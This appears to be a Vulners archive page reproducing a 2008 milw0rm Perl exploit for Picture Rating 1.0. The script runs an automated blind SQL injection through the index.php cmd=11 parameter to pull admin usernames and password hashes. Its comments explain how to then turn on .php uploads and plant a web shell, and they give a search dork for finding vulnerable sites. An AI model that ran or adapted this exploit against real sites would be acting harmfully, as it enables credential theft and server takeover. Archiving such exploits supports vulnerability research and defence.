Vulners
Lucene search
Picture Rating 1.0 - Blind SQL Injection Exploit
#!/usr/bin/perl
# -- Picture Rating 1.0 Blind SQL Injection Exploit --
# -Info/Instructions-
# After running this perl script, you will have admin details therefore you will be able to login to the admin area at http://site.com/control/
# ok once you have logged in has admin you can upload a shell, click "edit settings" and under the allowed extensions, add ".php" ok now
# register as a normal user or backup the database and get a existing users and login to the main site and navigate to upload image/photo and choose your shell and click upload
# the shell should successfully upload and now you will see a broken image, right click the broken image icon and get the link, navigate to this link in your browser and thats your shell ;)
# Vendor Not Notified
# Discovered By: t0pP8uZz
# Discovered On: 6 April 2008
# greetz: milw0rm.com, h4ck-y0u.org, ciphercrew!
# inurl:"index.php?cmd=" Latest Pictures hot
# -- Picture Rating 1.0 Blind SQL Injection Exploit --
use strict;
use LWP::Simple;
print "---------- Picture Rating 1.0 Blind SQL Injection Exploit ----------\n";
print "- Discovered && Coded By: t0pP8uZz -\n";
print "- Discovered On: 6 April 2008 -\n";
print "- -\n";
print "- This exploit will perform a automated BLIND SQL attack on .. -\n";
print "- .. the target host which is running the script. -\n";
print "--------------------------------------------------------------------\n";
print "\nEnter URL (ie: http://site.com/): ";
chomp(my $url=<STDIN>);
if(inject_test($url)) {
print "Injecting.. Please Wait this could take several minutes..\n\n";
my $details = blind($url);
print "Exploit Success! Admin Details: ".$details;
exit;
}
sub blind {
my $url = shift;
my $res = undef;
my $chr = 48;
my $substr = 1;
my $done = 1;
while($done) {
my $content = get($url."/index.php?cmd=11&listpics=Y&age1=13&age2=99 and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM admin),".$substr.",1))=".$chr."/*");
if($content =~ /Previous/ && $chr == 94) { $done = 0; }
elsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; }
else { $chr++; }
}
return $res;
}
sub inject_test {
my $url = shift;
my $true = get($url."/index.php?cmd=11&listpics=Y&age1=13&age2=99 and 1=1");
my $false = get($url."/index.php?cmd=11&listpics=Y&age1=13&age2=99 and 1=2");
if($true =~ /Previous/ && $false !~ /Previous/) {
print "\nTarget Site Vulnerable!\n\n";
return 1;
} else { print "\nTarget Site Not Vulnerable! Exiting.."; exit; }
}
# milw0rm.com [2008-04-05]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1